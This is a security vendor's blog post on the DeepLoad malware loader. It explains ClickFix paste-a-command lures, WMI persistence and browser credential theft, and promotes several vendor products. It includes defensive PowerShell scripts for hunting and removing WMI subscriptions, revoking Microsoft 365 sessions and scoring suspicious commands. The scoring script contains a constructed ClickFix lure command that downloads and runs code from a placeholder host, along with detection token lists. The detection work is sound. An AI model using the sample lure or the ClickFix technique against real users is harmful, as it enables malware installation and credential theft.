A New Loader, A Familiar Trick
Researchers at ReliaQuest have identified an active campaign distributing a previously undocumented malware loader they call DeepLoad. The delivery mechanism is ClickFix, a social engineering tactic that tricks users into executing malicious commands on their own machines, so the payload is already running by the time most technical defences get a look at it. ClickFix has been circulating in various forms since 2024, but DeepLoad represents a meaningful escalation. ReliaQuest assesses that the loader incorporates AI-assisted obfuscation, which lets it evade static scanning tools that rely on known signatures. Once it runs, credential theft begins immediately: passwords and session tokens stored in browsers are collected in the first execution window, so the data is gone even if the loader itself is later blocked or removed. That is the pattern worth paying attention to. The attack is designed so that a partial block still results in data loss, which changes the calculus for defenders significantly.
How Does a ClickFix Attack Actually Work?
ClickFix attacks follow a consistent sequence. A user encounters a webpage, document, or CAPTCHA prompt that instructs them to 'fix' an error or prove they are human by copying a command and pasting it into the Windows Run dialogue or a PowerShell window. The command is obfuscated and often padded with benign-looking text, so what the user sees reads like a verification step rather than script execution. Users comply because the prompt appears legitimate. Once that command runs, it downloads and executes the DeepLoad payload under the user's own account. From that point, the malware uses Windows Management Instrumentation (WMI) to establish persistence. WMI is a legitimate Windows component used for system management, which makes it a convenient hiding place: a WMI event subscription is stored inside the WMI repository rather than as a new executable on disk, and the code it launches is typically a built-in interpreter, so security tools that focus on file-based detection often miss it entirely. What makes DeepLoad particularly awkward to handle is the sequencing. Credential theft, targeting saved passwords and active session cookies in Chrome, Edge, Firefox, and similar browsers, begins during the initial execution window. By the time an endpoint protection tool raises an alert, the credentials may already be on their way out.
Why Static Scanning Is Not Enough Against This Threat
Traditional endpoint protection works by matching code against a library of known malicious signatures. It is reliable against known threats. Against something like DeepLoad, which ReliaQuest assesses as likely using AI-generated obfuscation to randomise its code structure, signature matching struggles. This is not a new problem; obfuscation has been a standard attacker technique for years. What is new is the scale at which AI tooling lets threat actors generate novel variants: every build can look different on disk while doing exactly the same thing in memory, so a signature written for one sample does not carry over to the next. The practical consequence is that organisations relying solely on traditional antivirus or basic endpoint protection are operating with a meaningful detection gap against this class of loader. Behavioural detection, which monitors what a process does rather than what it looks like, is where the advantage shifts back to defenders: however the loader is packed, it still has to spawn from a user-launched interpreter, read browser credential stores, write a WMI subscription and talk to the internet, and each of those actions can be watched. Tools like ESET's multi-layered endpoint protection, which combines signature detection with behavioural analysis and exploit blocking, are far better positioned to catch DeepLoad's process injection behaviour than signature-only solutions. For UK organisations, Coro's unified endpoint and email security provides a similar behavioural layer, particularly valuable for mid-market businesses without a dedicated security operations team.
WMI Persistence: Why Rebooting Won't Save You
Once DeepLoad establishes persistence via WMI, a simple reboot does nothing to remove it. Permanent WMI event subscriptions, the mechanism attackers use here, are built from three objects stored in the WMI repository: an __EventFilter (a WQL query describing the trigger, such as a timer tick or a user logon), an __EventConsumer (most often a CommandLineEventConsumer or ActiveScriptEventConsumer holding the command or script to run), and a __FilterToConsumerBinding that ties the two together. The repository survives reboots by design; it is part of Windows' own operational fabric. An attacker who has achieved WMI persistence can re-execute their payload every time the machine starts, every time a user logs in, or on a time-based schedule. The infection continues silently unless someone actively looks for and removes the subscription itself. Windows does record their creation: Sysmon events 19, 20 and 21 log new filters, consumers and bindings, and the Microsoft-Windows-WMI-Activity/Operational log writes event 5861 when a binding is registered, so the evidence exists if something is collecting it. This is exactly the kind of threat that managed detection and response services are built to find. Sophos MDR, for example, operates 24 hours a day monitoring for precisely these behavioural indicators: anomalous WMI event subscriptions, unexpected process injection, outbound connections to suspicious infrastructure. A well-tuned MDR service hunting across endpoints will surface WMI-based persistence where an automated scan may not.
- WMI event subscriptions persist across reboots — simply restarting an infected machine achieves nothing
- The technique is fileless in nature: the subscription lives in the WMI repository and launches a built-in interpreter, so file-based detection has limited visibility
- Manual forensic investigation or behavioural monitoring is required to identify and remove the persistence mechanism
- Affected credentials must be treated as compromised and rotated immediately, regardless of whether the loader is removed
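The hunt-and-remove step described above, and the WMI mechanics in the ClickFix walkthrough earlier on this page, as an added example. This is not code from the article or from ReliaQuest. It walks every __FilterToConsumerBinding in root/subscription, resolves the filter and consumer behind each one, and flags bindings whose consumer executes code, whose payload matches ClickFix-style tokens, or which are not in a baseline. The `$KnownGood` list and the `$BadTokens` pattern are assumptions to tune for your estate; the only binding a stock Windows install ships with is the SCM Event Log one.

```powershell
<#
  Added example, not from the article or ReliaQuest: enumerate WMI permanent
  event subscriptions and flag (optionally remove) the ones that look malicious.
  Assumptions: run elevated (root/subscription needs admin), PowerShell 5.1+;
  $KnownGood and $BadTokens are starting points, not a vendor-supplied list.
#>
[CmdletBinding(SupportsShouldProcess)]
param([switch]$Remove)   # report only unless -Remove is given; -WhatIf also works

$Namespace     = 'root/subscription'
# Stock Windows ships exactly one binding: 'SCM Event Log Filter' -> 'SCM Event Log Consumer'.
$KnownGood     = @('SCM Event Log Filter', 'SCM Event Log Consumer')
# Consumer classes that run attacker-supplied code when the filter fires.
$ExecConsumers = @('CommandLineEventConsumer', 'ActiveScriptEventConsumer')
# Strings that commonly appear in ClickFix-style payload commands (assumed list, extend as needed).
$BadTokens     = 'powershell|pwsh|-enc|-e |-w hidden|mshta|wscript|cscript|rundll32|regsvr32|https?://|\\temp\\|appdata|\biex\b|invoke-expression|downloadstring|frombase64string'

# Index filters and consumers by name so each binding can be resolved to both halves.
# Querying the abstract __EventConsumer class returns instances of every concrete consumer class.
$filters   = @{}; Get-CimInstance -Namespace $Namespace -ClassName __EventFilter   | ForEach-Object { $filters[$_.Name]   = $_ }
$consumers = @{}; Get-CimInstance -Namespace $Namespace -ClassName __EventConsumer | ForEach-Object { $consumers[$_.Name] = $_ }

$findings = foreach ($b in Get-CimInstance -Namespace $Namespace -ClassName __FilterToConsumerBinding) {
    # Reference properties on the binding expose the key (Name) of the object they point at.
    $f    = $filters[$b.Filter.Name]
    $c    = $consumers[$b.Consumer.Name]
    $type = if ($c) { $c.CimClass.CimClassName } else { 'unresolved' }

    # What actually runs when the filter's query matches.
    $payload = switch ($type) {
        'CommandLineEventConsumer'  { "$($c.ExecutablePath) $($c.CommandLineTemplate)" }
        'ActiveScriptEventConsumer' { "$($c.ScriptFileName) $($c.ScriptText)" }
        default                     { '' }
    }

    $reasons = @()
    if ($type -in $ExecConsumers)   { $reasons += "consumer executes code ($type)" }
    if ($payload -match $BadTokens) { $reasons += 'payload matches ClickFix-style tokens' }
    if ($b.Filter.Name -notin $KnownGood -or $b.Consumer.Name -notin $KnownGood) { $reasons += 'not in baseline' }

    [pscustomobject]@{
        Filter     = $b.Filter.Name
        Query      = if ($f) { $f.Query } else { '<filter missing>' }
        Consumer   = $b.Consumer.Name
        Type       = $type
        Payload    = $payload.Trim()
        Suspicious = $reasons.Count -gt 0
        Reasons    = $reasons -join '; '
        Binding    = $b
    }
}

$findings | Format-List Filter, Query, Consumer, Type, Payload, Suspicious, Reasons

if ($Remove) {
    foreach ($x in $findings | Where-Object { $_.Suspicious }) {
        if ($PSCmdlet.ShouldProcess("$($x.Filter) -> $($x.Consumer)", 'Remove WMI subscription')) {
            # Remove the binding first, then the consumer and filter it referenced.
            Remove-CimInstance -InputObject $x.Binding
            if ($consumers[$x.Consumer]) { Remove-CimInstance -InputObject $consumers[$x.Consumer] }
            if ($filters[$x.Filter])     { Remove-CimInstance -InputObject $filters[$x.Filter] }
        }
    }
}
```

Run it without `-Remove` first and read the `Query` and `Payload` columns: a timer-based filter (for example a query on Win32_LocalTime) bound to a CommandLineEventConsumer that launches an interpreter is the shape to expect here. Record the output before removal, because the filter query and consumer command are the forensic evidence of what ran and how often.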
What Happens to the Stolen Credentials?
Browser credential theft feeds directly into several downstream attack chains. Stolen session tokens are particularly valuable because they sidestep multi-factor authentication: the attacker inherits an already-authenticated session without needing the user's password or second factor. In practice, this means that even organisations with MFA deployed across their accounts face meaningful risk. A stolen session token for a Microsoft 365 account gives an attacker access to email, SharePoint, Teams, and connected applications for as long as that session remains valid, and attackers know how to refresh and extend sessions to prolong access, which is why revoking the user's sessions tenant-side matters as much as resetting the password. Stolen credentials and session tokens regularly appear on initial-access-broker marketplaces within hours of compromise. From there, they are sold to ransomware operators or used directly for business email compromise. The window between initial infection and downstream damage can be extremely short. This is where anti-data exfiltration tooling earns its value. BlackFog's ADX technology monitors for and blocks the outbound transfer of credential data and sensitive files in real time, acting at the point of exfiltration rather than relying solely on blocking the initial infection. Even if a loader executes, BlackFog can prevent the stolen data from leaving the device.
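The tenant-side containment this section (and the MFA question in the FAQ below) calls for, as an added example rather than anything from the article: for each account whose browser was raided, revoke its sessions, block sign-in for the incident window and reset the password. It uses the Microsoft.Graph PowerShell SDK; the user names are placeholders, and the Graph scopes are an assumption that may need adjusting to your tenant's role model.

```powershell
<#
  Added example, not from the article: containment for users whose browser
  session tokens may have been stolen. Uses the Microsoft.Graph PowerShell SDK
  (Install-Module Microsoft.Graph). User names are placeholders.
  Assumptions: the tenant is Entra ID / Microsoft 365 and the operator holds
  the scopes below (or an admin role that covers password resets).
#>
Import-Module Microsoft.Graph.Users, Microsoft.Graph.Users.Actions
Connect-MgGraph -Scopes 'User.ReadWrite.All', 'Directory.AccessAsUser.All' -NoWelcome

# Placeholder: the accounts that ran the ClickFix command, taken from EDR or a RunMRU hunt.
$Compromised = @('alice@example.invalid', 'bob@example.invalid')

function New-RandomPassword {
    # 24 distinct characters from digits, letters and punctuation; single-use because of ForceChangePasswordNextSignIn.
    -join ((48..57) + (65..90) + (97..122) + (33..47) | Get-Random -Count 24 | ForEach-Object { [char]$_ })
}

$results = foreach ($upn in $Compromised) {
    $u = Get-MgUser -UserId $upn -Property Id, UserPrincipalName

    # 1. Revoke: every refresh token and browser session cookie issued before now becomes invalid.
    #    Access tokens the attacker already holds keep working until they expire (up to an hour by
    #    default, sooner for apps that support continuous access evaluation), hence step 2.
    $revoked = Revoke-MgUserSignInSession -UserId $u.Id

    # 2. Block sign-in for the incident window so a replayed token or a second theft gets nothing.
    Update-MgUser -UserId $u.Id -AccountEnabled:$false

    # 3. Reset the password the infostealer also took, forcing a change at next logon.
    Update-MgUser -UserId $u.Id -PasswordProfile @{
        Password                      = New-RandomPassword
        ForceChangePasswordNextSignIn = $true
    }

    # Verify: the timestamp moves to now; anything issued before it is dead.
    $after = Get-MgUser -UserId $u.Id -Property SignInSessionsValidFromDateTime
    [pscustomobject]@{
        User              = $u.UserPrincipalName
        SessionsRevoked   = $revoked.Value
        SessionsValidFrom = $after.SignInSessionsValidFromDateTime
        SignInBlocked     = $true
    }
}
$results | Format-Table -AutoSize
```

Re-enable the accounts (`Update-MgUser -AccountEnabled:$true`) only once the endpoint has been cleaned and the WMI subscription removed; otherwise the next logon hands the loader a fresh set of cookies.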
How to Reduce Your Exposure to DeepLoad and ClickFix Campaigns
No single control eliminates this threat, but a layered approach closes most of the attack surface that ClickFix and DeepLoad exploit. The first line of defence is user awareness. ClickFix relies entirely on a user choosing to execute a command. Employees who understand that no legitimate website, software update, or CAPTCHA will ever ask them to paste commands into PowerShell are far harder to compromise. That said, social engineering is effective precisely because it is convincing: awareness training reduces risk but does not eliminate it. On the technical side, be careful what you expect from PowerShell's execution policy. It governs script files, not commands pasted into a console or the Run dialogue, and a pasted command can set -ExecutionPolicy Bypass for itself; Microsoft documents it as a safety feature, not a security boundary. Controls that actually remove the delivery mechanism are: removing the Run dialogue for standard users through Group Policy (the 'Remove Run menu from Start Menu' setting, which writes the NoRun value under HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer and also disables Win+R); application control (WDAC or AppLocker) that blocks powershell.exe, mshta.exe, wscript.exe and similar interpreters for users who have no business running them; PowerShell Constrained Language Mode for users who do; and Script Block Logging (event 4104 in Microsoft-Windows-PowerShell/Operational) so that whatever does run is recorded. Limiting local administrator rights matters too, because writing a permanent WMI subscription into root\subscription requires them. For ongoing monitoring, organisations should ensure their security tooling has visibility into WMI activity. Sophos XDR, for example, provides cross-layer detection across endpoints, email, and network traffic, the kind of correlated view that makes WMI-based persistence visible as an anomaly rather than routine system noise. Attack surface management is also relevant here. Hadrian's continuous external assessment identifies exposed assets and misconfigured services that attackers might use as initial lure infrastructure: phishing pages, lookalike domains, and similar staging resources that ClickFix campaigns depend on.
- Train staff to recognise and refuse requests to paste commands into PowerShell or the Run dialogue
- Treat PowerShell execution policy as a usability setting, not a control: block interpreters for standard users with WDAC or AppLocker, remove the Run dialogue by Group Policy where it is not needed, and limit local administrator rights
- Deploy behavioural endpoint protection with process injection and WMI monitoring capability
- Implement anti-data exfiltration tooling to block credential data leaving the device even if initial execution occurs
- Ensure MDR or SOC coverage provides 24/7 visibility into endpoint and network behavioural anomalies
- Treat any suspected compromise as a full credential rotation event — do not assume partial blocking means partial safety
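Since both the walkthrough earlier on this page and the list above turn on a command pasted into the Run dialogue or a PowerShell window, here is an added example (not code from the article or from ReliaQuest) of hunting for that event after the fact. It scores a command line for ClickFix traits, runs the scorer over a few constructed sample commands, and then applies it to the two places a pasted command leaves a trace on the host: each user's RunMRU registry key, where the Run dialogue keeps its history, and Security event 4688 process-creation records whose parent is explorer.exe. The samples are constructed for the demo and are not DeepLoad's real command; the event-log part assumes command-line auditing is enabled.

```powershell
<#
  Added example, not from the article or ReliaQuest: score a command line for
  ClickFix traits, then apply the scorer to the two places a pasted command
  leaves a trace on the host. The $Samples below are constructed for the demo.
  Assumptions: Security event 4688 with command-line auditing enabled for the
  event-log part; run elevated to read other users' RunMRU keys under HKU.
#>
function Test-ClickFixCommand {
    param([Parameter(Mandatory)][string]$CommandLine)
    $cl = $CommandLine.ToLowerInvariant()
    $hits = @()
    if ($cl -match '\b(powershell|pwsh|mshta|cmd|wscript|cscript|curl|certutil|bitsadmin)\b') { $hits += 'interpreter or LOLBin' }
    if ($cl -match '(^|\s)-(e|ec|enc|encodedcommand)\s')   { $hits += 'encoded command' }
    if ($cl -match '-w(indowstyle)?\s+h(idden)?\b')       { $hits += 'hidden window' }
    if ($cl -match '\biex\b|invoke-expression|\birm\b|\biwr\b|invoke-restmethod|invoke-webrequest|downloadstring|frombase64string') { $hits += 'download and run' }
    if ($cl -match 'https?://|\b\d{1,3}(\.\d{1,3}){3}\b') { $hits += 'remote address' }
    # ClickFix pages often append a comment such as "# I am not a robot" so the Run box shows something benign.
    if ($cl -match 'not a robot|captcha|verification|verify') { $hits += 'lure text' }
    [pscustomobject]@{ Score = $hits.Count; Indicators = ($hits -join ', '); CommandLine = $CommandLine }
}

# Constructed sample command lines: the first two are the shape a ClickFix lure typically produces.
$Samples = @(
    'powershell -w hidden -c "iex (irm https://example.invalid/v)" # I am not a robot - reCAPTCHA Verification ID: 7624',
    'mshta https://example.invalid/verify.hta',
    'notepad.exe',
    'cmd /c "winget upgrade --all"'
)
'--- constructed samples (score >= 2 is worth a look) ---'
$Samples | ForEach-Object { Test-ClickFixCommand $_ } | Where-Object { $_.Score -ge 2 } | Format-Table Score, Indicators, CommandLine -AutoSize

# 1. Run dialogue history for every loaded user hive. Each value is stored as "<command>\1".
'--- RunMRU ---'
if (-not (Get-PSDrive -Name HKU -ErrorAction SilentlyContinue)) {
    $null = New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS
}
foreach ($key in Get-Item 'HKU:\*\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -ErrorAction SilentlyContinue) {
    $sid    = $key.Name.Split('\')[1]
    $values = Get-ItemProperty -Path $key.PSPath
    # Entries are single-letter value names (a, b, c ...); MRUList gives their order.
    foreach ($p in $values.PSObject.Properties | Where-Object { $_.Name -match '^[a-z]$' }) {
        $r = Test-ClickFixCommand ($p.Value -replace '\\1$', '')
        if ($r.Score -ge 2) { $r | Add-Member -NotePropertyName User -NotePropertyValue $sid -PassThru }
    }
}

# 2. Process creation in the last 7 days where explorer.exe (the Run dialogue's host) launched the command.
'--- Security 4688 ---'
$filter = @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddDays(-7) }
foreach ($e in Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue) {
    $data   = ([xml]$e.ToXml()).Event.EventData.Data
    $cmd    = ($data | Where-Object { $_.Name -eq 'CommandLine' }).'#text'
    $parent = ($data | Where-Object { $_.Name -eq 'ParentProcessName' }).'#text'
    if ($cmd -and $parent -like '*\explorer.exe') {
        $r = Test-ClickFixCommand $cmd
        if ($r.Score -ge 2) { $r | Add-Member -NotePropertyName When -NotePropertyValue $e.TimeCreated -PassThru }
    }
}
```

On the constructed samples the first command scores 5 and the mshta one scores 3, while notepad.exe and the winget line stay below the threshold. A command pasted into an already-open PowerShell or Windows Terminal window will not have explorer.exe as its parent, so the 4688 part catches the Run-dialogue path; for the terminal path rely on Script Block Logging (event 4104), which records the pasted text itself.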
The Broader Pattern This Campaign Reveals
DeepLoad is not an isolated development. It reflects a broader trend in which attackers combine low-tech social engineering with technically sophisticated payloads. ClickFix works because it sidesteps the automated layers that inspect content: there is no attachment for an email filter and no download for a web proxy, because it asks the user to be the execution mechanism. Once the user has been convinced, the first technical control with a chance of seeing anything is process-level telemetry on the endpoint. Meanwhile, the technical components, AI-assisted obfuscation, WMI persistence, fileless execution and immediate credential theft, are each designed to survive or delay detection at every subsequent layer. The organisations that weather this kind of campaign are those that have accepted a core principle: prevention alone is insufficient. Detection speed and response capability determine the difference between an incident that is contained quickly and one that results in ransomware deployment, data breach notification, or regulatory action under the UK GDPR or New Zealand's Privacy Act 2020. For Australasian businesses, our endpoint security capabilities via ESET provide the behavioural detection depth that campaigns like DeepLoad demand, paired with the managed visibility needed to act on alerts before damage compounds. The full picture of your exposure, including third-party and supply chain risk that might introduce ClickFix lure infrastructure, is something Panorays is specifically built to assess. The threat is not abstract. DeepLoad is active now. The question is not whether organisations in your sector will be targeted; it is whether your current stack would detect it in time to matter.
Frequently Asked Questions
What is a ClickFix attack and how does it bypass security tools?
A ClickFix attack tricks users into copying and pasting a malicious command into Windows PowerShell or the Run dialogue, typically by disguising it as a verification or error-fix step. Because the user executes the command themselves, there is no attachment for an email filter to scan and no download for a web proxy to block; the first control with a chance to see it is process-level telemetry on the endpoint. The payload runs with the user's own permissions, which is enough to read that user's browser credential stores.
How does WMI persistence work and why is it difficult to detect?
Windows Management Instrumentation (WMI) is a legitimate Windows component that attackers can abuse to schedule code execution on startup, at logon, or on a timer. The persistence is a permanent event subscription: a filter (the trigger query), a consumer (the command or script to run) and a binding between them, all stored in the WMI repository under %SystemRoot%\System32\wbem\Repository rather than dropped as a file, which is why signature-based tools frequently miss it. Removing it means deleting the binding, consumer and filter from the root\subscription namespace, not rebooting or deleting files.
Can multi-factor authentication protect against DeepLoad credential theft?
MFA limits what a stolen password alone is worth, but it does nothing against stolen session tokens. DeepLoad targets session cookies stored in browsers, which represent already-authenticated sessions. An attacker who obtains a valid session token can access accounts directly without entering a password or MFA code. Organisations should deploy anti-data exfiltration tooling and ensure they can revoke a user's sessions tenant-side quickly (which invalidates refresh tokens and session cookies, although access tokens already issued remain valid until they expire) alongside MFA enforcement.